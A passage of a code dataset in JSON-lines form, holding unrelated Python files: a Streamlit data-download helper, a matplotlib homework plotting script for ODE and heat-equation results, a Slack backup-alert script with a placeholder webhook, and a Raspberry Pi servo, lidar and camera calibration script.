not os.path.isfile(fn):\n return False\n\n image_proc(self.h_img, IMAGE_LOAD, fn)\n size_x, size_y = image_proc(self.h_img, IMAGE_GET_SIZE)\n if not size_x or not size_y:\n return False\n\n dlg_proc(self.h_dlg_pic, DLG_CTL_PROP_SET, name='label_text', prop={\n 'cap': '%d×%d' % (size_x, size_y),\n })\n\n label_h = dlg_proc(self.h_dlg_pic, DLG_CTL_PROP_GET, name='label_text')['h']\n\n #ratio_xy = size_x/size_y\n #if size_x bytes conversions necessary here\n href = {}\n for o, file_type in zip([csv_obj, xlsx_obj], [\"csv\", \"excel\"]):\n try:\n b64 = base64.b64encode(o.encode()).decode()\n\n except AttributeError as e:\n b64 = base64.b64encode(towrite.read()).decode()\n extension = \".csv\" if file_type == \"csv\" else \".xlsx\"\n href[\n file_type\n ] = f'Download as {file_type}!'\n with st.beta_expander(\"Download Data\"):\n st.markdown(href[\"csv\"], unsafe_allow_html=True)\n st.markdown(href[\"excel\"], unsafe_allow_html=True)\n", "repo_name": "A3Data/a3lab-streamlit", "sub_path": "a3lab/streamlit_obj/st_viz.py", "file_name": "st_viz.py", "file_ext": "py", "file_size_in_byte": 2215, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}, {"api_name": "seaborn.scatterplot", "line_number": 12, "usage_type": "call"}, {"api_name": "altair.Chart", "line_number": 16, "usage_type": "call"}, {"api_name": "altair.X", "line_number": 17, "usage_type": "call"}, {"api_name": "altair.Scale", "line_number": 17, "usage_type": "call"}, {"api_name": "altair.Y", "line_number": 18, "usage_type": "call"}, {"api_name": "altair.Scale", "line_number": 18, "usage_type": "call"}, {"api_name": "plotly.express.scatter", "line_number": 25, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 25, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 41, "usage_type": "attribute"}, {"api_name": "io.BytesIO", "line_number": 43, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 51, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 54, "usage_type": "call"}, {"api_name": "streamlit.beta_expander", "line_number": 59, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 60, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 61, "usage_type": "call"}]} +{"seq_id": "32272017283", "text": "import numpy as np\nimport matplotlib.pylab as plt\nimport math\nfrom matplotlib import cm\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\ndatosODE1=np.genfromtxt(\"datosODE1.dat\",delimiter=\",\")\n\ntime1=datosODE1[:,0]\nposx=datosODE1[:,1]\nposy=datosODE1[:,2]\nvelx=datosODE1[:,3]\nvely=datosODE1[:,4]\n\n\nplt.figure()\nplt.plot(posx,posy,label=\"45\")\nplt.title('Trayectoria para 45 
grados')\nplt.xlabel('x')\nplt.ylabel('y')\nplt.ylim(0,3)\n#plt.show())\nplt.savefig(\"posxtiempo.pdf\")\n\ndatosODE2=np.genfromtxt(\"datosODE2.dat\",delimiter=\",\")\n\n#t1=datosODE2[:,0]\np1x=datosODE2[1:1800,1]\np1y=datosODE2[1:1800,2]\n#v1x=datosODE2[:,3]\n#v1y=datosODE2[:,4]\n\n#t2=datosODE2[:,5]\np2x=datosODE2[1801:3600,1]\np2y=datosODE2[1801:3600:,2]\n#v2x=datosODE2[:,8]\n#v2y=datosODE2[:,9]\n\n#t3=datosODE2[:,10]\np3x=datosODE2[3601:5400,1]\np3y=datosODE2[3601:5400,2]\n#v3x=datosODE2[:,13]\n#v3y=datosODE2[:,14]\n\n#t4=datosODE2[:,15]\np4x=datosODE2[5401:7200,1]\np4y=datosODE2[5401:7200,2]\n#v4x=datosODE2[:,18]\n#v4y=datosODE2[:,19]\n\n#t5=datosODE2[:,20]\np5x=datosODE2[7201:9000,1]\np5y=datosODE2[7201:9000,2]\n#v5x=datosODE2[:,23]\n#v5y=datosODE2[:,24]\n\n#t6=datosODE2[:,25]\np6x=datosODE2[9001:10800,1]\np6y=datosODE2[9001:10800,2]\n#v6x=datosODE2[:,28]\n#v6y=datosODE2[:,29]\n\n#t7=datosODE2[:,30]\np7x=datosODE2[10801:12600,1]\np7y=datosODE2[10801:12600,2]\n#v7x=datosODE2[:,33]\n#v7y=datosODE2[:,34]\n\nplt.figure()\nplt.plot(abs(p1x),(p1y),label=\"10\")\nplt.plot(abs(p2x),(p2y),label=\"20\")\nplt.plot(abs(p3x),(p3y),label=\"30\")\nplt.plot(abs(p4x),(p4y),label=\"40\")\nplt.plot(abs(posx),(posy),label=\"45\")\nplt.plot(abs(p5x),(p5y),label=\"50\")\nplt.plot(abs(p6x),(p6y),label=\"60\")\nplt.plot(abs(p7x),(p7y),label=\"70\")\nplt.xlim(0,5)\nplt.ylim(0,4)\nplt.title('Variacion en angulos')\nplt.xlabel(\"$x$\")\nplt.ylabel(\"$y$\")\nplt.legend(loc=\"best\")\n#plt.show()\n\nplt.savefig(\"posxtiempo2.pdf\")\n\n\n\n#---------------------------------------------------------------------------#---------------------------------------------------------------------------\n\n#PDE 3D\n#Guia para elaboracion de correctas grafics en 3D https://jakevdp.github.io/PythonDataScienceHandbook/04.12-three-dimensional-plotting.html\n\nxP=np.linspace(0,50,50)\nyP=np.linspace(0,50,50)\nx,y = np.meshgrid(xP,yP, sparse=True)\n\n\n#caso 1\ndatosC11=np.genfromtxt(\"datosPDEC11.dat\")\n#print(datosC11)\nfig=plt.figure()\nax = fig.gca(projection='3d')\nsup=ax.plot_surface(x,y,datosC11,antialiased=True,cmap=\"inferno\")\nfig.colorbar(sup, shrink=0.5, aspect=5)\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Temperatura')\nplt.title(\"Condiciones iniciales Caso 1\")\nplt.savefig(\"c1g1inial.pdf\")\n\n\nfig=plt.figure()\ndatosC12=np.genfromtxt(\"datosPDEC12.dat\")\nax = fig.gca(projection='3d')\nsup=ax.plot_surface(x,y,abs(datosC12),antialiased=True,cmap=\"inferno\")\nfig.colorbar(sup, shrink=0.5, aspect=5)\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Temperatura')\nplt.title(\"Estado Intermedio Caso 1\")\nplt.savefig(\"c1g2inter.pdf\")\n\n\nfig=plt.figure()\ndatosC13=np.genfromtxt(\"datosPDEC13.dat\")\nax = fig.gca(projection='3d')\nsup=ax.plot_surface(x,y,abs(datosC13),antialiased=True,cmap=\"inferno\")\nfig.colorbar(sup, shrink=0.5, aspect=5)\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Temperatura')\nplt.title(\"Estado Intermedio 2 Caso 1\" )\nplt.legend(loc=\"best\")\nplt.savefig(\"c1g3inter.pdf\")\n\nfig=plt.figure()\ndatosC14=np.genfromtxt(\"datosPDEC14.dat\")\nax = fig.gca(projection='3d')\nsup=ax.plot_surface(x,y,abs(datosC14),antialiased=True,cmap=\"inferno\")\nfig.colorbar(sup, shrink=0.5, aspect=5)\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Temperatura')\nplt.title(\"Estado final Caso 1 \")\n\nplt.savefig(\"c1g4equi.pdf\")\nplt.show()\n'''\nplt.figure()\ndatosC15=np.genfromtxt(\"datosPDEC14.dat\")\nplt.plot()\nplt.title(\"Temperatura promedio Caso 
3\")\nplt.legend(loc=\"best\")\n#plt.savefig(\"c1g5prom.pdf\")'''\n\n#----------------------------------------------------------------------#--------------------------------------------------------------------------------\n#caso 2\n\ndatosC21=np.genfromtxt(\"datosPDEC11.dat\")\nfig=plt.figure()\nax = fig.gca(projection='3d')\nsup=ax.plot_surface(x,y,datosC21,antialiased=True,cmap=\"inferno\")\nfig.colorbar(sup, shrink=0.5, aspect=5)\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Temperatura')\nplt.title(\"Condiciones iniciales Caso 2\")\nplt.savefig(\"c2g1inial.pdf\")\n\ndatosC22=np.genfromtxt(\"datosPDEC22.dat\")\nfig=plt.figure()\nax = fig.gca(projection='3d')\nsup=ax.plot_surface(x,y,datosC22,antialiased=True,cmap=\"inferno\")\nfig.colorbar(sup, shrink=0.5, aspect=5)\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Temperatura')\nplt.title(\"Estado Intermedio-Caso 2\")\nplt.savefig(\"c2g2inte.pdf\")\n\n\ndatosC23=np.genfromtxt(\"datosPDEC23.dat\")\nfig=plt.figure()\nax = fig.gca(projection='3d')\nsup=ax.plot_surface(x,y,datosC23,antialiased=True,cmap=\"inferno\")\nfig.colorbar(sup, shrink=0.5, aspect=5)\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Temperatura')\nplt.title(\"Estado Intermedio 2- Caso 2\")\nplt.savefig(\"c3g3inter.pdf\")\n\n\ndatosC24=np.genfromtxt(\"datosPDEC24.dat\")\nfig=plt.figure()\nax =fig.gca(projection='3d')\nsup=ax.plot_surface(x,y,datosC24,antialiased=True,cmap=\"inferno\")\nfig.colorbar(sup, shrink=0.5, aspect=5)\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Temperatura')\nplt.title(\"Configuracion de Equilibrio Caso 1\")\n\nplt.savefig(\"c2g4equi.pdf\")\n'''\nplt.figure()\ndatosC25=np.genfromtxt(\"datosPDEC25.dat\")\nplt.plot()\nax.set_zlabel('Temperatura')\nplt.title(\"Temperatura promedio Caso 3\")\n#plt.savefig(\"c2g5prom.pdf\")'''\n\n\n#------------------------------------------------------------------------------------------------------------------------------------------------------\n#caso 3\n\nfig=plt.figure()\ndatosC31=np.genfromtxt(\"datosPDEC11.dat\")\nax = fig.gca(projection='3d')\nsup=ax.plot_surface(x,y,datosC31,antialiased=True,cmap=\"inferno\")\nfig.colorbar(sup, shrink=0.5, aspect=5)\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Temperatura')\nplt.title(\"Condiciones iniciales Caso 2\")\nplt.savefig(\"c3g1inial.pdf\")\n\nfig=plt.figure()\ndatosC32=np.genfromtxt(\"datosPDEC32.dat\")\nax = fig.gca(projection='3d')\nsup=ax.plot_surface(x,y,datosC32,antialiased=True,cmap=\"inferno\")\nfig.colorbar(sup, shrink=0.5, aspect=5)\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Temperatura')\nplt.title(\"Estado Intermedio Caso 3\")\nplt.savefig(\"c3g2inter.pdf\")\n\nfig=plt.figure()\ndatosC33=np.genfromtxt(\"datosPDEC33.dat\")\nax = fig.gca(projection='3d')\nsup=ax.plot_surface(x,y,datosC33,antialiased=True,cmap=\"inferno\")\nfig.colorbar(sup, shrink=0.5, aspect=5)\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Temperatura')\nplt.title(\"Estado Intermedio 2- Caso 3 \")\nplt.savefig(\"c3g3inter.pdf\")\n\nfig=plt.figure()\ndatosC34=np.genfromtxt(\"datosPDEC34.dat\")\nax = fig.gca(projection='3d')\nsup=ax.plot_surface(x,y,datosC34,antialiased=True,cmap=\"inferno\")\nfig.colorbar(sup, shrink=0.5, aspect=5)\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Temperatura')\nplt.title(\"Configuracion de Equilibrio Caso 3\")\nplt.savefig(\"c3g4equi.pdf\")\n\n'''\nplt.figure()\ndatosC35=np.genfromtxt(\"datosPDEC35.dat\")\nplt.plot()\nplt.title(\"Temperatura promedio Caso 
3\")'''\n#plt.savefig(\"c3g5prom.pdf\")'''\n", "repo_name": "davilab1/AvilaDario_hw4", "sub_path": "Plots_hw4.py", "file_name": "Plots_hw4.py", "file_ext": "py", "file_size_in_byte": 7076, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.genfromtxt", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.pylab.figure", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pylab.plot", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pylab.title", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pylab.xlabel", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pylab.ylabel", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pylab.ylim", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pylab.savefig", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 24, "usage_type": "name"}, {"api_name": "numpy.genfromtxt", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pylab.figure", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 70, "usage_type": "name"}, {"api_name": "matplotlib.pylab.plot", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 71, "usage_type": "name"}, {"api_name": "matplotlib.pylab.plot", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 72, "usage_type": "name"}, {"api_name": "matplotlib.pylab.plot", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pylab.plot", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pylab.plot", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pylab.plot", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 76, "usage_type": "name"}, {"api_name": "matplotlib.pylab.plot", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pylab.plot", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pylab.xlim", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pylab.ylim", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 80, "usage_type": "name"}, {"api_name": "matplotlib.pylab.title", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pylab.xlabel", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 82, 
"usage_type": "name"}, {"api_name": "matplotlib.pylab.ylabel", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pylab.legend", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pylab.savefig", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 87, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.genfromtxt", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pylab.figure", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pylab.title", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 111, "usage_type": "name"}, {"api_name": "matplotlib.pylab.savefig", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pylab.figure", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 115, "usage_type": "name"}, {"api_name": "numpy.genfromtxt", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pylab.title", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pylab.savefig", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 124, "usage_type": "name"}, {"api_name": "matplotlib.pylab.figure", "line_number": 127, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 127, "usage_type": "name"}, {"api_name": "numpy.genfromtxt", "line_number": 128, "usage_type": "call"}, {"api_name": "matplotlib.pylab.title", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 135, "usage_type": "name"}, {"api_name": "matplotlib.pylab.legend", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 136, "usage_type": "name"}, {"api_name": "matplotlib.pylab.savefig", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 137, "usage_type": "name"}, {"api_name": "matplotlib.pylab.figure", "line_number": 139, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 139, "usage_type": "name"}, {"api_name": "numpy.genfromtxt", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pylab.title", "line_number": 147, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 147, "usage_type": "name"}, {"api_name": "matplotlib.pylab.savefig", "line_number": 149, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 149, "usage_type": "name"}, {"api_name": "matplotlib.pylab.show", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 150, "usage_type": "name"}, {"api_name": "numpy.genfromtxt", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pylab.figure", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 163, "usage_type": "name"}, {"api_name": "matplotlib.pylab.title", "line_number": 170, "usage_type": 
"call"}, {"api_name": "matplotlib.pylab", "line_number": 170, "usage_type": "name"}, {"api_name": "matplotlib.pylab.savefig", "line_number": 171, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 171, "usage_type": "name"}, {"api_name": "numpy.genfromtxt", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.pylab.figure", "line_number": 174, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 174, "usage_type": "name"}, {"api_name": "matplotlib.pylab.title", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 181, "usage_type": "name"}, {"api_name": "matplotlib.pylab.savefig", "line_number": 182, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 182, "usage_type": "name"}, {"api_name": "numpy.genfromtxt", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pylab.figure", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 186, "usage_type": "name"}, {"api_name": "matplotlib.pylab.title", "line_number": 193, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 193, "usage_type": "name"}, {"api_name": "matplotlib.pylab.savefig", "line_number": 194, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 194, "usage_type": "name"}, {"api_name": "numpy.genfromtxt", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pylab.figure", "line_number": 198, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 198, "usage_type": "name"}, {"api_name": "matplotlib.pylab.title", "line_number": 205, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 205, "usage_type": "name"}, {"api_name": "matplotlib.pylab.savefig", "line_number": 207, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 207, "usage_type": "name"}, {"api_name": "matplotlib.pylab.figure", "line_number": 220, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 220, "usage_type": "name"}, {"api_name": "numpy.genfromtxt", "line_number": 221, "usage_type": "call"}, {"api_name": "matplotlib.pylab.title", "line_number": 228, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 228, "usage_type": "name"}, {"api_name": "matplotlib.pylab.savefig", "line_number": 229, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 229, "usage_type": "name"}, {"api_name": "matplotlib.pylab.figure", "line_number": 231, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 231, "usage_type": "name"}, {"api_name": "numpy.genfromtxt", "line_number": 232, "usage_type": "call"}, {"api_name": "matplotlib.pylab.title", "line_number": 239, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 239, "usage_type": "name"}, {"api_name": "matplotlib.pylab.savefig", "line_number": 240, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 240, "usage_type": "name"}, {"api_name": "matplotlib.pylab.figure", "line_number": 242, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 242, "usage_type": "name"}, {"api_name": "numpy.genfromtxt", "line_number": 243, "usage_type": "call"}, {"api_name": "matplotlib.pylab.title", "line_number": 250, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 250, "usage_type": "name"}, {"api_name": "matplotlib.pylab.savefig", "line_number": 251, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 251, "usage_type": 
"name"}, {"api_name": "matplotlib.pylab.figure", "line_number": 253, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 253, "usage_type": "name"}, {"api_name": "numpy.genfromtxt", "line_number": 254, "usage_type": "call"}, {"api_name": "matplotlib.pylab.title", "line_number": 261, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 261, "usage_type": "name"}, {"api_name": "matplotlib.pylab.savefig", "line_number": 262, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 262, "usage_type": "name"}]} +{"seq_id": "8016809319", "text": "#!/usr/bin/env python3\nimport requests, json, argparse\n\nSLACK_URL = \"https://hooks.slack.com/services/AAAAAA/BBBBBBB/CCCCCC\"\nCHANNEL = \"#alerts\"\nEMOJI = \":terminator:\"\nCOLOR = \"danger\"\n\ndef alert():\n parser = argparse.ArgumentParser(description='Send an alert when the Opstoolbox backup fails.')\n parser.add_argument('error_file', help=\"The log file\")\n args = parser.parse_args()\n error_file = args.error_file\n slack(error_file)\n\ndef slack(error_file):\n with open(error_file, \"r\") as err_file:\n MSG = err_file.read().strip()\n MESSAGE = {\n \"username\": \"Opstoolbox Backup\",\n \"channel\": CHANNEL,\n \"icon_emoji\": EMOJI,\n \"attachments\": [\n {\n \"fallback\": \"There was an error backing up Opstoolbox and an error sending this message. Check /opt/backup/TODAY/backup.log\",\n \"color\": \"danger\",\n \"title\": \"Opstoolbox Backup Issue\",\n \"text\": MSG\n },\n ],\n }\n requests.post(SLACK_URL, data=json.dumps(MESSAGE), headers={'Content-Type': 'application/json'})\n err_file.close()\n\nalert()", "repo_name": "imm-llc/scriptcity-public", "sub_path": "opsTBbackup/backup_alert.py", "file_name": "backup_alert.py", "file_ext": "py", "file_size_in_byte": 1122, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 32, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "11669043658", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 11 18:53:37 2021\n\n@author: Haidi,Xingda,Sijia,Xi\n\"\"\"\nimport datetime\nimport inquirer\nimport serial\nimport time\nimport cv2\nimport numpy as np\nimport RPi.GPIO as GPIO\nimport pandas as pd\nimport random\nimport sys\nfrom numpy.linalg import svd\nfrom numpy.linalg import matrix_rank as rank\nfrom scipy.linalg import diagsvd\nfrom functions import *\n\n# set servos position\ndef MotorControl(pan,tilt): \n string_temp = 's'+str(pan)+str(tilt)+'\\n'\n string = bytes(string_temp,'utf-8')\n ser.write(bytes(string))\n #time.sleep(1) \n return None\n\n# Solve a Homogeneous Linear Equation System: Ax=0\ndef sol_svd(A):\n A = np.array(A)\n # find the eigenvalues and eigenvector of U(transpose).U\n e_vals, e_vecs = np.linalg.eig(np.dot(A.T, A)) \n # extract the eigenvector (column) associated with the minimum eigenvalue\n return e_vecs[:, np.argmin(e_vals)]\n\n# Matrix A\ndef Matrix(x,y,z,u,v,A):\n coe1 = [u, v, 1, 0, 0, 0, 0, 0, 0, -u*x, -v*x, -x]\n coe2 = [0, 0, 0, u, v, 1, 0, 0, 0, -u*y, -v*y, -y]\n coe3 = [0, 0, 0, 0, 0, 0, u, v, 1, -u*z, -v*z, -z]\n A.append(coe1)\n A.append(coe2)\n A.append(coe3)\n return A\n\n# get corresponding cordinate after getting M\ndef get_corr_point(M,u,v):\n M = M.reshape((4,3))\n x = (M[0][0]*u + M[0][1]*v + M[0][2])/(M[3][0]*u + M[3][1]*v + M[3][2])\n y = (M[1][0]*u + 
M[1][1]*v + M[1][2])/(M[3][0]*u + M[3][1]*v + M[3][2])\n z = (M[2][0]*u + M[2][1]*v + M[2][2])/(M[3][0]*u + M[3][1]*v + M[3][2])\n p3 = np.array([[x],[y],[z]])\n return p3\n\n# get polar coordinate system and cartesian coordinate system\ndef raw2polar_cart(rawM): \n T = np.zeros((int(rawM.size/5),3))\n points_size = int(T.size/3)\n points = np.zeros((points_size,3))\n for i in range(points_size): \n T[i,0] = mapfun(rawM[5*i]*256+rawM[5*i+1],0,4096,0,2*math.pi)\n T[i,1] = mapfun(rawM[5*i+2]*256+rawM[5*i+3],1024,3072,0,math.pi)\n T[i,2] = rawM[5*i+4] \n for i in range(points_size):\n points[i,0] = T[i,2]*math.sin(T[i,1])*math.cos(T[i,0])\n points[i,1] = T[i,2]*math.sin(T[i,1])*math.sin(T[i,0])\n points[i,2]=16-math.cos(T[i,1])*T[i,2]\n \n return T,points\n\n\nif __name__ == '__main__': \n cap = cv2.VideoCapture(0)\n \n diff = []\n A = []\n points_cloud = []\n # define the number of points we would like to take in calibration\n number_of_samples = 10\n x = 0\n y = 0\n z = 0\n cnt = 0\n mode = 0\n led = 14\n tll = 15\n random_index = 0\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(14,GPIO.OUT)\n GPIO.setup(15,GPIO.OUT)\n GPIO.output(led, GPIO.HIGH) \n #Hsv values for green color \n lower_green = np.array([40,40,40])\n upper_green = np.array([70,255,255])\n ser = serial.Serial('/dev/ttyUSB0',115200,timeout=1)\n ser.flush()\n #mode 0: hardware setup\n while mode == 0 :\n if ser.in_waiting > 0: \n line = ser.readline().decode('utf-8').rstrip()\n print(line)\n if line == \"Ready\":\n ServoReady = 1\n questions = [\n inquirer.List('next',\n message=\"What do you want to do next?\",\n choices=['Scanning', 'Calibration','Beetle_redirection'],),\n ]\n answers = inquirer.prompt(questions)\n if answers['next'] == \"Scanning\":\n string_scan_temp = 's'+\"StartScanning\"+'\\n'\n string_scan = bytes(string_scan_temp,'utf-8')\n ser.write(bytes(string_scan))\n mode = 1\n else:\n # Get the data from Lidar and process them to get the polar points and xyz points\n df = pd.read_csv(r'points_cloud.csv',header=None) #read the csv file (put 'r' before the path string to address any special characters in the path, such as '\\'). 
Don't forget to put the file name at the end of the path + \".csv\"\n rawM = df.to_numpy()\n T,points = raw2polar_cart(rawM)\n if answers['next'] == \"Calibration\":\n string_cal_temp = 's'+\"StartCalibration\"+'\\n'\n string_cal = bytes(string_cal_temp,'utf-8')\n ser.write(bytes(string_cal))\n mode = 2\n else:\n M_matrix = pd.read_csv(r'Calibration_matrix.csv',header=None)\n M = M_matrix.to_numpy()\n string_cal_temp = 's'+\"StartCalibration\"+'\\n'\n string_cal = bytes(string_cal_temp,'utf-8')\n ser.write(bytes(string_cal))\n cnt = 0\n mode = 4\n \n #mode 1: get points cloud and process them\n while mode == 1 : \n if ser.in_waiting > 0: \n line = ser.readline().decode('utf-8').rstrip()\n print(line)\n if line == \"Scan done\" :\n np.savetxt('points_cloud.csv', np.array(points_cloud), fmt=\"%s\",delimiter=',')\n sys.exit()\n else :\n points_cloud.append(line)\n \n #mode 2: calibration \n while mode == 2 :\n # Turn off laser\n GPIO.output(tll, GPIO.HIGH)\n # Capture frame\n _, frame = cap.read()\n hsv_image = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n green = cv2.inRange(hsv_image, lower_green, upper_green)\n # remove noise\n kernel = np.ones((5,5),np.uint8)\n green = cv2.morphologyEx(green, cv2.MORPH_CLOSE, kernel)\n cnts,_ = cv2.findContours(green,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE) \n if len(cnts) != 0:\n # find the biggest countour (c) by the area\n c = max(cnts, key = cv2.contourArea) \n (X, Y, W, H) = cv2.boundingRect(c)\n cv2.rectangle(frame, (X, Y), (X + W, Y + H), (255, 0, 0), 3)\n #if there are data in serial port \n if ser.in_waiting > 0: \n line = ser.readline().decode('utf-8').rstrip()\n print(line)\n # The servos are in position \n if line == \"In position\":\n # Do matching when servos are in position\n if len(cnts) != 0:\n # compute the center of the contour\n u = round((X + W) / 2)\n v = round((Y + H) / 2)\n print(u,v)\n # (x, y, z) in 3D model\n # (u, v) in frame\n x = points[int(random_index),0]\n 